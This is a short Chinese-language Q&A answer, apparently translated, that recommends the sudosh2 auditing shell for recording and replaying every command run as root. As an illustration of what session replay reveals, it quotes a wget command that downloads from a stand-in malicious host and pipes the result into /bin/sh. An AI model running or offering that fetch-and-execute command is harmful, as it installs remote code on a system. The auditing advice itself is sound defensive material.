security – 记录从root执行的每个命令

查看sudosh2. sudosh2由FreeBSD端口提供.软件包可用于RedHat和Ubuntu.以下是他们网站的描述：

sudosh is an auditing shell filter and can be used as a login shell.
Sudosh records all keystrokes and output and can play back the session
as just like a VCR.

Sudosh将允许您重播用户的会话,这将允许您在用户看到它时查看所有输入和输出.你会看到一切,击键,拼写错误,退格,他们在vi中编辑的内容,wget的输出-O- http://zyxzyxzyxzyx.ru/haxor/malware | / bin / sh等

可以将sudosh日志发送到syslog,以便它们可以存储在远离系统的中央syslog服务器上.

请注意,sudosh2是sudosh的替代品,被其作者遗弃

您是否在用户坚持拥有超级用户权限的学术机构工作？或者您是在公司工作并希望允许用户在自己的VM上拥有超级用户权限？这可能是您的解决方案.